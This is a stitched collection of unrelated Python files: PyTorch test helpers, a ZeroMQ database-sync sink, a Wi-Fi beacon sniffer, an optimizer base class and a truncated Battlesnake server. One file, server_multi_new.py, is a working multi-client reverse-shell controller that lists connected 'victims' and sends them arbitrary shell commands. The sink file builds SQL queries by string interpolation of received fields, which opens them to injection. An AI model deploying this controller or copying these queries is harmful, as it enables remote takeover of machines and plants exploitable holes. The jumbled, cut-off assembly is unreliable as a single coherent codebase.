k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
# FIXME: remove this by updating test suites using it
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
# FIXME: remove this by updating test suites using it
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# FIXME: improve load_tests() documentation here
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
# FIXME: document this and move it to test_serialization
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
# forward-mode AD are tested by default. We create this wrapper because we'd like to keep new checks
# to be disabled to default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0") == "1":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
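# Hedged usage sketch: called like autograd.gradcheck, but with
# batched-grad checks and fast mode on by default:
#
#   x = torch.randn(3, dtype=torch.double, requires_grad=True)
#   assert gradcheck(torch.sin, (x,))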
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0") == "1":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
# FIXME: delete this
# Using @toleranceOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
# FIXME: move to test_sparse or sparse utils
# This is a wrapper that wraps a test to run this test twice, one with
# coalesced=True, another with coalesced=False for coalesced/uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
# return the shared library file in the installed folder if exist,
# else the file in the build folder
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
Similar to unittest.skip, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for the following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
# Returns scalar tensor representation of a list of integer byte values
def bytes_to_scalar(byte_list: List[int], dtype: torch.dtype, device: torch.device):
dtype_to_ctype: Dict[torch.dtype, Any] = {
torch.int8: ctypes.c_int8,
torch.uint8: ctypes.c_uint8,
torch.int16: ctypes.c_int16,
torch.int32: ctypes.c_int32,
torch.int64: ctypes.c_int64,
torch.bool: ctypes.c_bool,
torch.float32: ctypes.c_float,
torch.complex64: ctypes.c_float,
torch.float64: ctypes.c_double,
torch.complex128: ctypes.c_double,
}
ctype = dtype_to_ctype[dtype]
num_bytes = ctypes.sizeof(ctype)
def check_bytes(byte_list):
for byte in byte_list:
assert 0 <= byte <= 255
if dtype.is_complex:
assert len(byte_list) == (num_bytes * 2)
check_bytes(byte_list)
real = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[:num_bytes])).value
imag = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[num_bytes:])).value
res = real + 1j * imag
else:
assert len(byte_list) == num_bytes
check_bytes(byte_list)
res = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list)).value
return torch.tensor(res, device=device, dtype=dtype)
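# Hedged worked examples (assuming a little-endian platform, since
# ctypes.from_buffer uses native byte order):
#
#   bytes_to_scalar([1, 0, 0, 0], torch.int32, 'cpu')       # tensor(1)
#   bytes_to_scalar([0, 0, 128, 63], torch.float32, 'cpu')  # tensor(1.)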
def sandcastle_skip_if(condition, reason):
"""
Similar to unittest.skipIf, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if condition:
if IS_SANDCASTLE:
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for the following reason: {reason}', file=sys.stderr)
return wrapper
else:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
return decorator
def dtype_name(dtype):
""" Returns the pretty name of the dtype (e.g. torch.int64 -> int64). """
return str(dtype).split('.')[1]
def set_single_threaded_if_parallel_tbb(fn):
"""Set test to be single threaded for parallel tbb.
See https://github.com/pytorch/pytorch/issues/64571#issuecomment-914691883
"""
if not IS_TBB:
return fn
@wraps(fn)
def wrap_fn(*args, **kwargs):
num_threads = torch.get_num_threads()
torch.set_num_threads(1)
try:
return fn(*args, **kwargs)
finally:
torch.set_num_threads(num_threads)
return wrap_fn
@functools.lru_cache()
def get_cycles_per_ms() -> float:
"""Measure and return approximate number of cycles per millisecond for torch.cuda._sleep
"""
def measure() -> float:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
cycles_per_ms = 1000000 / start.elapsed_time(end)
return cycles_per_ms
# Get 10 values and remove the 2 max and 2 min and return the avg.
# This is to avoid system disturbances that skew the results, e.g.
# the very first cuda call likely does a bunch of init, which takes
# much longer than subsequent calls.
#
# Tested on both Tesla V100, Quadro GP100, Titan RTX, RTX 3090 GPUs
# and seems to return stable values. Therefore, we enable caching
# using lru_cache decorator above.
num = 10
vals = []
for _ in range(num):
vals.append(measure())
vals = sorted(vals)
return mean(vals[2 : num - 2])
# OpInfo utils
T = TypeVar('T')
def first_sample(self: unittest.TestCase, samples: Iterable[T]) -> T:
"""
Returns the first sample from an iterable of samples, like those returned by OpInfo.
The test will be skipped if no samples are available.
"""
try:
return next(iter(samples))
except StopIteration:
raise unittest.SkipTest('Skipped! Need at least 1 sample input')
# this helper method is to recursively
# clone the tensor-type input of operators tested by OpInfo
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
@contextmanager
def custom_op(opname, symbolic_fn, opset_version):
"""Context manager/decorator to test ONNX export with custom oeprator"""
try:
register_custom_op_symbolic(opname, symbolic_fn, opset_version)
yield
finally:
unregister_custom_op_symbolic(opname, opset_version)
|
sink.py | import sys
import time
import datetime
import zmq
import json
from encryption import AES256
import env as env
from DatabaseConnection import DatabaseConnection
from systemlog import SystemLog
from inbox import Inbox
from outbox import Outbox
import os
from threading import Thread
class Sink:
data = None
def __init__(self, dbhost, dbusername, dbpass, dbname, sinkaddr, skey, ivkey):
self.key = skey
self.iv = ivkey
self.context = zmq.Context()
self.receiver = self.context.socket(zmq.PULL)
self.receiver.bind(sinkaddr)
self.syslog = SystemLog()
self.db = DatabaseConnection(
dbhost, dbusername, dbpass, dbname)
self.inbox = Inbox(self.db)
self.outbox = Outbox(self.db)
def recv_json(self):
msg = self.receiver.recv_json()
enc = AES256()
try:
plain = json.loads(enc.decrypt(self.iv, msg['data'], self.key))
except json.decoder.JSONDecodeError:
return {
'error': 'Invalid secret key or IV key'
}
msg['data'] = plain[0]
self.data = msg
return msg
def auth(self):
return int(self.data['sender_id']) == int(self.data['data']['sender_id'])
def recvAck(self, data):
conn = DatabaseConnection(
env.DB_HOST, env.DB_UNAME, env.DB_PASSWORD, env.DB_NAME)
obox = conn.executeFetchOne(
f"select * from tb_sync_outbox where outbox_id = {data['query']}")
ack = True
if(obox['data']):
if (obox['data']['msg_type'] == 'INS'):
status = 'need_pk_update'
else:
status = 'arrived'
# ack = self.outbox.update(data={
# 'status': status
# }, where_clause={
# 'outbox_id': data['query']
# })
ack = conn.executeCommit(
f"update tb_sync_outbox set status='{status}' where outbox_id={data['query']}")
sink = Sink(env.DB_HOST, env.DB_UNAME, env.DB_PASSWORD,
env.DB_NAME, env.SINK_ADDR, env.SECRET_KEY, env.IV_KEY)
while True:
s = sink.recv_json()
# print(s)
print("------------------------")
if ('error' in s):
print("Status: Invalid secret key or IV ke")
print(s)
else:
print(f"MSG ID: {s['data']['msg_id']}")
print(f"Type: {s['data']['msg_type']}")
# authenticate message
# if(not sink.auth()):
# continue
# sink.db.connect()
# check whether this message has already been
# received before or not
accepted = False
if (s['data']['msg_type'] != 'ACK'):
checkMsgQuery = """
select ifnull(count(*), 0) as total from tb_sync_inbox where msg_id = {} and client_unique_id = {}
"""
checkMsg = sink.db.executeFetchOne(sql=checkMsgQuery.format(
s['data']['msg_id'], s['data']['client_unique_id']))
if(checkMsg['execute_status']):
if(checkMsg['data']['total'] <= 0):
accepted = True
else:
sink.syslog.insert(
"accepted-msg", "Execute Error: {}".format(checkMsg['error_data']['msg']))
else:
checkMsgQuery = """
select ifnull(count(*), 0) as total from tb_sync_inbox where msg_type = 'ACK' and client_unique_id = {} and query='{}'
"""
checkMsg = sink.db.executeFetchOne(sql=checkMsgQuery.format(
s['data']['client_unique_id'], s['data']['query']))
if(checkMsg['execute_status']):
if(checkMsg['data']['total'] <= 0):
accepted = True
# insert message to db
print("Status: ", end="")
if (accepted):
# print(s['data'])
if (s['data']['msg_type'] == 'ACKS'):
thread = Thread(target=sink.recvAck, args=(s['data'],))
thread.start()
else:
insert = sink.inbox.insert(s['data'])
if (not insert):
print(sink.db.getLastCommitError())
# sql = """
# insert into tb_sync_inbox(row_id, table_name, msg_id, `query`, `msg_type`, client_unique_id, master_status, occur_at, first_time_occur_at)
# values({}, "{}", {},"{}", "{}", {}, {}, {}, {})
# """
# insert = sink.db.executeCommit(autoconnect=False, sql=sql.format(
# s['data']['row_id'], s['data']['table_name'], s['data']['msg_id'], s['data']['data'], s['data']['msg_type'], s['data']['sender_id'], s['data']['master_status'], s['data']['unix_timestamp']))
print('Accepted')
else:
print('Rejected')
# send back which message is received using worker
# only reply non-ACK msg
if(s['data']['msg_type'] != 'ACK' and s['data']['msg_type'] != 'REG'):
data = s['data']
sink.outbox.insert(data={
'row_id': 0,
'table_name': data['table_name'],
'msg_type': 'ACK',
'query': data['msg_id'],
'client_unique_id': data['client_unique_id'],
'msg_id': 0,
'priority': 1
})
# print("end time: {}".format(int(round(time.time() * 1000))))
|
server_multi_new.py | import socket
import sys
import threading
import time
from queue import Queue
NUMBER_OF_THREADS = 2
JOB_NUMBER = [1, 2]
queue = Queue()
all_connections = []
all_address = []
# Create a Socket ( connect two computers)
def create_socket():
try:
global host
global port
global s
host = ""
port = 9998
s = socket.socket()
except socket.error as msg:
print("Socket creation error: " + str(msg))
# Binding the socket and listening for connections
def bind_socket():
try:
global host
global port
global s
print("Binding the Port: " + str(port))
s.bind((host, port))
s.listen(5)
except socket.error as msg:
print("Socket Binding error" + str(msg) + "\n" + "Retrying...")
bind_socket()
# Handling connection from multiple clients and saving to a list
# Closing previous connections when server.py file is restarted
def accepting_connections():
for c in all_connections:
c.close()
del all_connections[:]
del all_address[:]
while True:
try:
conn, address = s.accept()
s.setblocking(1)  # blocking mode, so accept() waits instead of timing out
all_connections.append(conn)
all_address.append(address)
print("Connection has been established :" + address[0])
except:
print("Error accepting connections")
# 2nd thread functions - 1) See all the clients 2) Select a client 3) Send commands to the connected client
# Interactive prompt for sending commands
# turtle> list
# 0 Friend-A Port
# 1 Friend-B Port
# 2 Friend-C Port
# turtle> select 1
# 192.168.0.112> dir
def start_turtle():
while True:
cmd = input('turtle> ')
if cmd == 'list':
list_connections()
elif 'select' in cmd:
conn = get_target(cmd)
if conn is not None:
send_target_commands(conn)
elif cmd == 'quit':
print("Bye Bye Host!")
sys.exit()
# break
else:
print("Command not recognized")
# Display all current active connections with client
def list_connections():
results = ''
for i, conn in enumerate(all_connections):
try:
conn.send(str.encode(' '))
conn.recv(20480)
except:
del all_connections[i]
del all_address[i]
continue
results += str(i) + " " + str(all_address[i][0]) + " " + str(all_address[i][1]) + "\n"
print("----Clients----" + "\n" + results)
# Selecting the target
def get_target(cmd):
try:
target = cmd.replace('select ', '') # target = id
target = int(target)
conn = all_connections[target]
print("You are now connected to :" + str(all_address[target][0]))
print(str(all_address[target][0]) + ">", end="")
return conn
# 192.168.0.4> dir
except:
print("Selection not valid")
return None
# Send commands to client/victim or a friend
def send_target_commands(conn):
while True:
try:
cmd = input()
if cmd == 'quit':
break
if len(str.encode(cmd)) > 0:
conn.send(str.encode(cmd))
client_response = str(conn.recv(20480), "utf-8")
print(client_response, end="")
except:
print("Error sending commands")
break
# Create worker threads
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
# Do next job that is in the queue (handle connections, send commands)
def work():
while True:
x = queue.get()
if x == 1:
create_socket()
bind_socket()
accepting_connections()
if x == 2:
start_turtle()
queue.task_done()
def create_jobs():
for x in JOB_NUMBER:
queue.put(x)
queue.join()
create_workers()
create_jobs() |
algorithm.py | import numpy as np
import pandas as pd
import attr
import time
from tqdm.auto import tqdm
from optimistic import experiment as objective
from .plotting import Plotter
from threading import Thread
from ipywidgets import Text
from parametric import Parameter
@attr.s
class Algorithm:
''' A base class for parameter space exploration and optimization.
Arguments:
experiment (callable): a function or method which measures the
objective function at the current point in
the parameter space. Takes no positional arguments.
parameters (dict): instances of the parametric.Parameter class to use
during optimization. Defaults to empty, and Parameters
can be added by calling Algorithm.add_parameter().
bounds (dict): tuple bounds indexed by Parameter names. Defaults to empty,
and is set when adding Parameters.
points (dict): optional points for each Parameter to override default
point generation in optimizers, e.g. sampling locations
for a grid search or initial population in a genetic algorithm.
sign (int): choose between maximization (+1) and minimization (-1)
X (2d array): coordinates sampled during optimization. Defaults to empty,
but previous results can be passed (along with results into
the y argument) to speed up some optimizers.
y (1d array): objective function evaluations. Defaults to empty.
threaded (bool): if True, run optimization in a separate thread.
show_progress (bool): whether to display a progress bar during
optimization. Adds <1 ms overhead per iteration.
record_data (bool): whether to store X, y observations. Adds <1 ms overhead per iteration.
display (bool): whether to display optimization status using ipywidgets.
Only works when running in a Jupyter environment.
continuous (bool): whether to quit after convergence/specified number of iterations
or continue running.
'''
experiment = attr.ib(default=None)
parameters = attr.ib(factory=dict)
bounds = attr.ib(factory=dict)
points = attr.ib(factory=dict) # optional overrides to search points
sign = attr.ib(default=1, converter=np.sign)
X = attr.ib(factory=lambda: np.atleast_2d([]))
y = attr.ib(factory=lambda: np.array([]))
threaded = attr.ib(default=False)
show_progress = attr.ib(default=False)
record_data = attr.ib(default=True)
display = attr.ib(default=False)
continuous = attr.ib(default=False)
output = attr.ib(default=None)
def add_parameter(self, parameter, bounds=None, points=None):
''' Adds a parameter.
Arguments:
parameter (parametric.Parameter)
bounds (tuple): a (min, max) pair defining the extent of the
optimization. If no bounds are passed but a set of
points is specified, use the min/max values of
points; otherwise, use the default parameter bounds.
points (array-like): a list of points to override sampling behavior
in the algorithm.
'''
self.parameters[parameter.name] = parameter
if bounds is None:
if points is not None:
self.bounds[parameter.name] = (np.min(points), np.max(points))
elif parameter.bounds == (-np.inf, np.inf):
raise ValueError('Define parameter bounds!')
else:
self.bounds[parameter.name] = parameter.bounds
else:
self.bounds[parameter.name] = bounds
if points is not None: # override point selection
self.points[parameter.name] = points
return self
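# Hedged usage sketch (names and the Parameter constructor signature are
# assumptions about the parametric package):
#
#   x = Parameter('x', 0.5)
#   algo = Algorithm(experiment=my_experiment)  # my_experiment is hypothetical
#   algo.add_parameter(x, bounds=(0, 1))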
def check_bounds(self, point):
''' Checks that the point is within the specified bounds '''
i = 0
for name, parameter in self.parameters.items():
bounds = self.bounds[name]
if not bounds[0] <= point[i] <= bounds[1]:
raise ValueError(f'The optimizer requested a point outside the valid bounds for parameter {parameter.name} and will now terminate.')
i += 1
def measure(self, point):
''' Actuate to specified point and measure result '''
if self.experiment is None:
raise ValueError('No experiment has been assigned to this optimizer!')
self.check_bounds(point)
new_values = {}
for i, (name, parameter) in enumerate(self.parameters.items()):
new_values[name] = point[i]
if isinstance(self.experiment, Parameter):
result = objective(self.experiment)(optimizer=self, **new_values) # manually wrap
else:
result = self.experiment(optimizer=self, **new_values)
if self.record_data:
if len(self.X[0]) == 0:
self.X = np.atleast_2d(point)
else:
self.X = np.append(self.X, np.atleast_2d(point), axis=0)
self.y = np.append(self.y, result)
if self.display:
if self.output is None:
self.output = Text()
display(self.output)
self.output.value = str(point) + ' -> ' + str(result)
return -self.sign*result
@property
def dataset(self):
''' If the optimizer is set to data_format = 'numpy', this converts acquired
data into a pandas.DataFrame.
'''
df = pd.DataFrame(self.X, columns = list(self.parameters.keys()))
df[self.experiment.__name__] = self.y
return df
@objective
def metacost(self):
''' Runs an optimization and returns the integrated cost as an objective
function for meta-optimization. The @objective tag supports passing
any of the optimizer parameters into the metacost evaluation.
'''
# measure original coordinates
original_coordinates = {}
for p in self.parameters.values():
original_coordinates[p.name] = p()
# run experiment and compute integral of objective function
self.data = pd.DataFrame()
self.run()
integrated_cost = self.data[self.experiment.__name__].sum()
# reset coordinates
for p in original_coordinates:
self.parameters[p](original_coordinates[p])
return -integrated_cost
@property
def plot(self):
return Plotter(self)
@classmethod
def study(cls, experiment, parameter, bounds, **kwargs):
''' Launches a 1D optimization of the passed experiment with
the given parameter and bounds. You can include any keyword arguments
you want to pass to the optimizer.
'''
inst = cls(experiment, **kwargs)
inst.add_parameter(parameter, bounds=bounds)
inst.run()
inst.plot.parameter_space(parameter)
return inst
def range(self, iterations):
''' Functions similarly to the built-in range() generator, e.g.
for i in self.range(10):
print(i)
prints integers from 0 to 9. However, if self.continuous==True,
i will be reset to 0 afterwards and the integers will be repeatedly
printed in order until execution is interrupted.
'''
if not self.continuous:
yield from range(iterations)
else:
i = 0
while True:
yield i
i = (i + 1) % iterations
def iterate(self, lst):
''' Functions similarly to iterating over a built-in list, e.g.
for x in [1, 2, 3]:
print(x)
prints 1, 2, and 3. However, if self.continuous==True,
this function will continue to loop through the list values.
If self.show_progress==True, returns a tqdm generator for displaying
a progress bar.
'''
if self.show_progress and not self.continuous:
yield from tqdm(lst)
elif not self.continuous:
yield from list(lst)
else:
i = 0
while True:
yield lst[i]
i = (i+1) % len(lst)
def run(self):
if self.threaded:
Thread(target=self._run).start()
else:
self._run()
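# Hedged subclass sketch: run() delegates to self._run(), which concrete
# optimizers are expected to provide. A minimal grid search might look
# like this (illustrative only):
#
#   @attr.s
#   class GridSearch(Algorithm):
#       steps = attr.ib(default=10)
#       def _run(self):
#           name = list(self.parameters)[0]
#           lo, hi = self.bounds[name]
#           for x in self.iterate(np.linspace(lo, hi, self.steps)):
#               self.measure([x])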
|
main.py |
from threading import Thread
import queue
from scapy.all import *
import netifaces
from tabulate import tabulate
import random, os, time
from multiprocessing import Process
def channel_hopper():
while True:
try:
channel = random.randrange(1,15)
os.system("iw dev %s set channel %d" % ("wlxc83a35cef744", channel))
time.sleep(1)
except KeyboardInterrupt:
break
class sniffer(object):
def __init__(self, options):
self.parser_options = options
self.plugins = {}
self._status = False
self._filter = self.parser_options
self.output = []
self.headers = ['Channel', 'BSSID', 'SSID']
def run(self):
pass
def checkIface(self, iface):
return iface in netifaces.interfaces()
def getStatus(self):
return self._status
def setStatus(self, status):
self._status = status
def getStringFilter(self):
return self._filter
def setStringFilter(self, value):
self._filter = value
def callBackPackets(self, pkt):
if ( pkt.haslayer(Dot11Beacon)):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3
channel = int( ord(pkt[Dot11Elt:3].info))
#print("{} {} {} {}".format(int(channel), enc, bssid, ssid))
self.output.append([channel, bssid, ssid])
os.system("clear")
print(tabulate(self.output, self.headers, tablefmt="simple"))
def main(self):
if not self.checkIface(self.parser_options):
return
p = Process(target = channel_hopper)
p.start()
sniff(iface=self.parser_options, prn=self.callBackPackets)
teste = sniffer("wlxc83a35cef744")
teste.main()
|
server.py | import logging
import os
import threading
from flask.helpers import make_response, send_file
from training.train import AtomicCounter, Trainer
from training.snake import Snake
import os
from flask import Flask
from flask import request
import server_logic
app = Flask(__name__)
state = server_logic.State(os.getenv("DEBUG", False))
@app.after_request
def after_request_func(response):
response.headers.add('Access-Control-Allow-Credentials', 'true')
response.headers.add('Access-Control-Allow-Headers', '*')
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Methods', '*')
return response
@app.get("/")
def handle_info():
"""
This function is called when you register your Battlesnake on play.battlesnake.com
See https://docs.battlesnake.com/guides/getting-started#step-4-register-your-battlesnake
It controls your Battlesnake appearance and author permissions.
For customization options, see https://docs.battlesnake.com/references/personalization
    TIP: If you open your Battlesnake URL in a browser you should see this data.
"""
return {
"apiversion": "1",
"author": "alecdivito",
"color": "#00FF00", # TODO: Personalize
"head": "default", # TODO: Personalize
"tail": "default", # TODO: Personalize
}
@app.post("/start")
def handle_start():
"""
    This function is called every time your snake is entered into a game.
request.json contains information about the game that's about to be played.
"""
data = request.get_json()
number_of_snakes = len(data['board']['snakes'])
state.newGame(data["game"]["id"], number_of_snakes)
return "ok"
@app.post("/move")
def handle_move():
"""
This function is called on every turn of a game. It's how your snake decides where to move.
Valid moves are "up", "down", "left", or "right".
"""
data = request.get_json()
return {"move": state.move(data["game"]["id"], data)}
@app.post("/end")
def end():
"""
This function is called when a game your snake was in ends.
It's purely for informational purposes, you don't have to make any decisions here.
"""
data = request.get_json()
state.endGame(data["game"]["id"], data)
return "ok"
@app.get("/download")
def download():
"""
    This function is used to download training data that may be stuck on a
    server that is training with live data (snakes).
"""
data_file_path = state.build_data_zip_file()
return send_file(data_file_path, as_attachment=True)
if __name__ == "__main__":
logging.getLogger("werkzeug").setLevel(logging.ERROR)
print("Starting Battlesnake Server...")
port = int(os.environ.get("PORT", "8080"))
print("Is this being deployed to productions? {}".format(
